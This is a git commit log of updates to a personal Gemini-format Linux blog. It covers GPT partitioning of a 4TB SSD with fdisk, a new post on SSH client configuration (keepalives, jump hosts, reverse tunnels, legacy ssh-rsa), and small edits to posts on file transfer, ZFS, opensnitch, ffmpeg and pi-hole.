15:33:45 + +On a new 4TB SSD, I ran these commands and the new partion was 2TB: + +``` +fdisk /dev/nvme0n1 + +Welcome to fdisk (util-linux 2.38.1). +Changes will remain in memory only, until you decide to write them. +Be careful before using the write command. + +Device does not contain a recognized partition table. +The size of this disk is 3.6 TiB (4000787030016 bytes). DOS partition table format cannot be used on drives for volumes larger than 2199023255040 bytes for 512-byte sectors. Use GUID partition table format (GPT). + +Created a new DOS (MBR) disklabel with disk identifier 0xefe222ab. + +Command (m for help): n +Partition type + p primary (0 primary, 0 extended, 4 free) + e extended (container for logical partitions) +Select (default p): p +Partition number (1-4, default 1): 1 +First sector (2048-4294967295, default 2048): +Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4294967295, default 4294967295): + +Created a new partition 1 of type 'Linux' and of size 2 TiB +``` + +By default, fdisk creates a DOS partition table and as written in warning message above, the largest partition in a DOS partition table is 2TB. + +A GPT partition table needs to be created, in fdisk it is done with the 'g' command: + +``` +fdisk /dev/nvme0n1 +# or +# fdisk -n /dev/nvme0n1 +# to not create a default partition table + +Welcome to fdisk (util-linux 2.38.1). +Changes will remain in memory only, until you decide to write them. +Be careful before using the write command. + +The size of this disk is 3.6 TiB (4000787030016 bytes). DOS partition table format cannot be used on drives for volumes larger than 2199023255040 bytes for 512-byte sectors. Use GUID partition table format (GPT). + +Command (m for help): g +Created a new GPT disklabel (GUID: 65F870F4-96CD-294A-99D5-E009CB0122D4). +The device contains 'dos' signature and it will be removed by a write command. See fdisk(8) man page and --wipe option for more details. + +Command (m for help): p + +Disk /dev/nvme0n1: 3.64 TiB, 4000787030016 bytes, 7814037168 sectors +Disk model: Seagate FireCuda 530 ZP4000GM30013 +Units: sectors of 1 * 512 = 512 bytes +Sector size (logical/physical): 512 bytes / 512 bytes +I/O size (minimum/optimal): 512 bytes / 512 bytes +Disklabel type: gpt +Disk identifier: 65F870F4-96CD-294A-99D5-E009CB0122D4 + +Command (m for help): n +Partition number (1-128, default 1): 1 +First sector (2048-7814037134, default 2048): +Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-7814037134, default 7814035455): + +Created a new partition 1 of type 'Linux filesystem' and of size 3.6 TiB. +Partition #1 contains a ext4 signature. + +Do you want to remove the signature? [Y]es/[N]o: Y + +The signature will be removed by a write command. + +Command (m for help): w +The partition table has been altered. +Calling ioctl() to re-read partition table. +Syncing disks. +``` + +Then I create an ext4 file system in the 4TB partition: + +``` +# mkfs -t ext4 /dev/nvme0n1p1 +mke2fs 1.46.6 (1-Feb-2023) +Discarding device blocks: done +Creating filesystem with 976754176 4k blocks and 244195328 inodes +Filesystem UUID: acf7bbfa-4321-42b5-b785-a6993b742679 +Superblock backups stored on blocks: + 32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, + 4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968, + 102400000, 214990848, 512000000, 550731776, 644972544 + +Allocating group tables: done +Writing inode tables: done +Creating journal (262144 blocks): done +Writing superblocks and filesystem accounting information: done + +# mount /dev/nvme0n1p1 /mnt +``` + +=> feed.gmi Feed commit 4992e6427b1f9f5352a6fec649703d81d359ee30 Author: Remy Noulin <loader2x@gmail.com> Date: Mon Mar 13 10:17:39 2023 +0200 Update diff --git a/2021-06-27-zfs-commands.gmi b/2021-06-27-zfs-commands.gmi index 2ffbc44..f2c3149 100644 --- a/2021-06-27-zfs-commands.gmi +++ b/2021-06-27-zfs-commands.gmi @@ -266,6 +266,7 @@ get state: ``` zfs get snapdir poolName/datasetName zfs set snapdir=visible poolName/datasetName +zfs set snapdir=hidden poolName/datasetName ``` * clone snapshot to dataset commit d44233ddc7c12fe2b3d11e3879617d97ac898795 Author: Remy Noulin <loader2x@gmail.com> Date: Tue Feb 28 09:39:52 2023 +0200 Update diff --git a/2023-02-28-ssh-configurations.gmi b/2023-02-28-ssh-configurations.gmi new file mode 100644 index 0000000..7e9f140 --- /dev/null +++ b/2023-02-28-ssh-configurations.gmi @@ -0,0 +1,150 @@ +# SSH client configurations + +=> feed.gmi Feed + +date: 2023-02-28 09:39:25 + +categories: linux + +firstPublishDate: 2023-02-28 09:39:25 + +Here is a set of SSH client configurations I usually use and find useful. + +The SSH client configuration is stored in + +``` +~/.ssh/config +``` + +When a NAT router is involved between the client and server, it closes the TCP connections after a long time of inactivity (about 10 minutes for my router). To prevent the router from closing the connection, I keep connection alive with these options in the config file: + +``` +Host * + ServerAliveInterval 290 + ServerAliveCountMax 2 +``` + +I generate my Identity keys like this: + +``` +ssh-keygen -t rsa -b 4096 +# or +ssh-keygen -t ed25519 +ssh-keygen -t ed25519 -f filename +``` + +A password can be set on the key to protect it. The key password is asked at each new connection unless the key is loaded in SSH-agent (more information about SSH-agent below). The public key has to be copied to `~/.ssh/authorized_keys` in the server and the client has to use the private key to connect with key instead of password: + +``` +ssh -i ~/.ssh/id_rsa myuser@example.com +``` + +It is possible to replace this command line with something shorter: + +``` +ssh server +``` + +In order to do that, add a configuration in `~/.ssh/config`: + +``` +host server + HostName example.com + IdentityFile ~/.ssh/id_rsa + Port 22 + User myuser +``` + +With SSH, one can do server hop and connect to a machine not reachable from the public internet. + +``` +Client -> host1 Server on Internet -> host2 Server in LAN +``` + +Without configuration, it is done like this: + +``` +ssh -J myuser@server auser@host2 +``` + +It is configured like this in `~/.ssh/config`: + +``` +host insideServer + Hostname host2 + User auser + IdentityFile ~/.ssh/id_rsa_InsideServer + ProxyCommand ssh server -W %h:%p +``` + +Multiple jump host can be in a chain to a destination. All the identity files (the secret keys) have to be in the client machine. + +Sometimes I want to connect to a host not reachable from the public internet without a jump host, then I use reverse tunneling like this: + +``` +# I connect the server (not reachable from the internet) to the client (example.com) +ssh -i ~/.ssh/id_rsa -R 19999:localhost:22 -C user@example.com +# On the client, I connect to port 19999 +ssh userOnServer@localhost -p 19999 +``` + +I use SSH agent to load the keys with password, the password is asked only when the key is loaded: + +``` +eval $(ssh-agent) +# add keys +ssh-add ~/.ssh/id_rsa +``` + +SHA-1 signature has been disable after version 8.8 (2021-09-26), so older ssh clients can't connect to newer ssh servers and newer clients can't connect to older servers. A solution is to upgrade the client to a newer version, another solution is to accept legacy hostkey using ssh-rsa algorithm for the machine with the old ssh server: + +Set the configuration for the old server in `~/.ssh/config` like this: + +``` +host oldserver + HostName example.com + IdentityFile ~/.ssh/id_rsa + Port 22 + User myuser + PubkeyAcceptedAlgorithms +ssh-rsa + HostkeyAlgorithms +ssh-rsa +``` + +When I can't upgrade or change configuration, I setup an ftp server, see: +=> 2022-04-22-how-to-transfer-files-between-devices.gmi How to transfer files between devices + +or I use a third machine: + +* Machine A has an old SSH server +* Machine B has Debian Bullseye which can connect to the old machine A and the new machine C with Debian Bookworm +* Machine C has Debian Bookworm, machine C cannot connect to machine A. The error is: "Unable to negotiate with 192.168.1.2 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss" + +I copy the files from A to C through B with pipes and `tar` (or `cat` for single file): + +``` +# From C +# Copy a file in A to C: +ssh B 'ssh A "cat file"' > file +# Copy multiple files in A to C, the data is compressed with bzip2 on the network: +ssh B 'ssh A "/bin/tar cj file1 dir2 file3"' | tar xj +``` + +It is possible to store ssh keys in tpm 2.0, I haven't tried yet: => +=> https://jade.fyi/blog/tpm-ssh/ +=> +=> https://blog.ledger.com/ssh-with-tpm/ + +Related articles: +=> 2020-06-20-how-to-tunnel-firefox-through-ssh.gmi How to tunnel firefox through ssh + +=> 2021-06-27-zfs-commands.gmi Zfs commands + +=> 2021-07-21-ssh-clients-in-ios.gmi SSH clients in ios + +=> 2022-04-22-how-to-transfer-files-between-devices.gmi How to transfer files between devices + +=> 2022-12-23-using-tor.gmi Using tor + +Tag: #ssh + +=> feed.gmi Feed commit b0501d71995ce423d1c08fef7f7cd8a2b5a62f5f Author: Remy Noulin <loader2x@gmail.com> Date: Mon Feb 27 15:35:24 2023 +0200 Update diff --git a/2021-07-30-installing-opensnitch.gmi b/2021-07-30-installing-opensnitch.gmi index d6fc35c..db315e4 100644 --- a/2021-07-30-installing-opensnitch.gmi +++ b/2021-07-30-installing-opensnitch.gmi @@ -1,8 +1,8 @@ -# Installing opensnitch in Debian Buster +# Installing opensnitch in Debian (Buster and newer) => feed.gmi Feed -date: 2021-07-30 13:20:47 +date: 2023-02-27 10:58:36 categories: privacy @@ -20,6 +20,14 @@ I don't use chrome in general but according to this article => https://www.unixsheikh.com/articles/choose-your-browser-carefully.html Choose your browser carefully , it also makes unwanted connections. +# The Opensnitch package available in Debian Bookworm + +Install it with apt: + +``` +apt-get install opensnitch python3-opensnitch-ui +``` + # How to install opensnitch Download the prebuilt deb packages: daemon and GUI diff --git a/2022-04-22-how-to-transfer-files-between-devices.gmi b/2022-04-22-how-to-transfer-files-between-devices.gmi index 8d63a0c..cdcbf4a 100644 --- a/2022-04-22-how-to-transfer-files-between-devices.gmi +++ b/2022-04-22-how-to-transfer-files-between-devices.gmi @@ -2,13 +2,13 @@ => feed.gmi Feed -date: 2022-04-22 23:01:45 +date: 2023-02-26 16:21:23 categories: default firstPublishDate: 2022-04-22 23:01:45 -I use multiple devices and I need to copy files between them. I mainly transfer the files with ssh/scp/sftp, rsync, samba/cifs and web servers. +I use multiple devices and I need to copy files between them. I mainly transfer the files with ssh/scp/sftp, rsync, samba/cifs, web and ftp servers. ## SSH @@ -62,6 +62,20 @@ mc # then F9 > Right > SFTP link > example.com ``` +With SSH, it is possible to use a middle machine to transfer files: + +* Machine A has the files +* Machine B is in the middle +* Machine C downloads from machine A + +For this, I use `tar`: + +``` +# From C +# the data is compressed with bzip2 on the network: +ssh B 'ssh A "/bin/tar cj file1 dir2 file3"' | tar xj +``` + ## Sharing drives I share drives through the local network with samba/cifs. I have my media on a server and the server disk is shared with my other machines. @@ -109,6 +123,32 @@ server.dir-listing = "enable" /etc/init.d/lighttpd restart ``` +## FTP + +I install pure-ftpd server, there is no configuration and it works directly after installation: + +``` +apt-get install pure-ftpd +``` + +The ftp clients I use are `ncftp` and `mc`: + +``` +apt-get install ncftp mc + +# ncftp usage +# open connection +open -u user serverAddress +# copy directory from client machine to server +put -R directory + +# mc usage +# To open connection: Choose FTP link... +ftp://user@serverAddress +# on older mc, it is: +user@serverAddress +``` + ## Other alternatives * Syncthing is a background program that copies or deletes files in specified directories between computer. @@ -122,4 +162,6 @@ I don't use these systems because they take resources while not using them and I * Sshfs allows sharing a drive on a remote machine through an ssh connection, it is similar to samba and it needs a mount point on the local machine. +Tags: #ssh #rsync #samba #cifs #ftp + => feed.gmi Feed commit 8256794b1d60b37b6cc09c240a21e1dabe683e3c Author: Remy Noulin <loader2x@gmail.com> Date: Thu Feb 23 18:12:34 2023 +0200 Update diff --git a/2021-07-21-ssh-clients-in-ios.gmi b/2021-07-21-ssh-clients-in-ios.gmi index c8ec62e..37929e9 100644 --- a/2021-07-21-ssh-clients-in-ios.gmi +++ b/2021-07-21-ssh-clients-in-ios.gmi @@ -20,6 +20,8 @@ Blink Shell & Code Editor (free and open source) => https://blink.sh blink.sh +Well, sometimes blink looks itself and I have to wait 1 minute. + hashtags: #updates #ssh #iphone => feed.gmi Feed diff --git a/2021-09-06-coding-in-assembly-in-linux.gmi b/2021-09-06-coding-in-assembly-in-linux.gmi index 5937dd3..bb95a58 100644 --- a/2021-09-06-coding-in-assembly-in-linux.gmi +++ b/2021-09-06-coding-in-assembly-in-linux.gmi @@ -2,7 +2,7 @@ => feed.gmi Feed -date: 2021-09-06 19:38:28 +date: 2023-02-23 18:05:10 categories: assembly @@ -75,6 +75,11 @@ Also when a program crashes, the process stops and there is no need to reboot th I created a program that prints the number of arguments and the arguments themselves. It finishes by printing 'Hello world' in 3 ways (call, call with struc, macro). +For a more advanced program, check out `spartasm` a spartan server. +=> gemini://gmi.noulin.net/gitRepositories/spartserv/files.gmi spartasm (gemini) + +=> https://noulin.net/spartserv/files.html spartasm (http) + Here is a library I created to try the nasm features (file: `libInc.asm`): ``` diff --git a/2022-05-25-encoding-videos-in-av1-with-ffmpeg.gmi b/2022-05-25-encoding-videos-in-av1-with-ffmpeg.gmi index 0165b1e..0b3be09 100644 --- a/2022-05-25-encoding-videos-in-av1-with-ffmpeg.gmi +++ b/2022-05-25-encoding-videos-in-av1-with-ffmpeg.gmi @@ -2,7 +2,7 @@ => feed.gmi Feed -date: 2023-02-08 21:12:36 +date: 2023-02-23 18:11:45 categories: linux @@ -24,6 +24,8 @@ I encode my videos with libaom to get smaller files for a given quality because I film with my iPhone in 4k 60 fps hevc and I don't have a computer that can play these videos so I also scale down the resolution. +Encoding the iPhone videos in h264 (using the parameters below) make them 20 times smaller, I transfer back to the videos to iPhone to save space and avoid having to use iCloud. + # Install I installed FFmpeg and libaom from apt but I don't recommend doing this because it is better to use the latest AV1 encoders. commit d7eecf569f6686d953d3faea23e8bf79e3d6808b Author: Remy Noulin <loader2x@gmail.com> Date: Thu Feb 23 16:47:15 2023 +0200 Update diff --git a/2020-08-23-devices.gmi b/2020-08-23-devices.gmi index 0366ef0..287660b 100644 --- a/2020-08-23-devices.gmi +++ b/2020-08-23-devices.gmi @@ -2,7 +2,7 @@ => feed.gmi Feed -date: 2022-01-09 23:16:36 +date: 2023-02-23 16:33:18 categories: hardware @@ -12,7 +12,7 @@ In the 90s, I was keeping my computers for 2 years maximum, in the 2000s I was k I have a Compaq laptop from 2009 (32bit) that I don't use anymore because the network card fails when the computer is on for a few days. I keep it and plan to use it a temporary replacement machine. -The power supply on my Intel Core I7 980 desktop computer (2010) died in 2021, I bought a new one and it works fine again. +The power supply on my Intel Core I7 980 desktop computer (2010) died in 2021, I bought a new one. The power supply died again in 2023, I bought a new one and it works fine again. My backup server died in June 2021: diff --git a/2021-04-10-blocking-ads-with-pihole.gmi b/2021-04-10-blocking-ads-with-pihole.gmi index ebf3920..c873345 100644 --- a/2021-04-10-blocking-ads-with-pihole.gmi +++ b/2021-04-10-blocking-ads-with-pihole.gmi @@ -2,7 +2,7 @@ => feed.gmi Feed -date: 2021-04-10 14:49:31 +date: 2023-02-23 16:46:40 categories: privacy @@ -31,6 +31,11 @@ I watch the french news on => https://www.francetvinfo.fr/replay-jt/ and recently the page changed and I was not able to watch the videos anymore. After debugging, I found that pi-hole blocked `sdk.privacy-center.org` and that this server is required to be able to watch the videos. So I added `sdk.privacy-center.org` to the whitelist in pi-hole using the web interface and now I can watch the french news again. +I recently noticed that some legetimate sites are added to the block lists, causing issues on these sites. I also have wifi issues, my devices get disconnected. When a site doesn't work: + +* I check that my device is online and can access other sites +* I check the logs in pihole, if I see something a domain related to the site I'm trying to access, I add it to the allow list. + hashtags: #privacy => feed.gmi Feed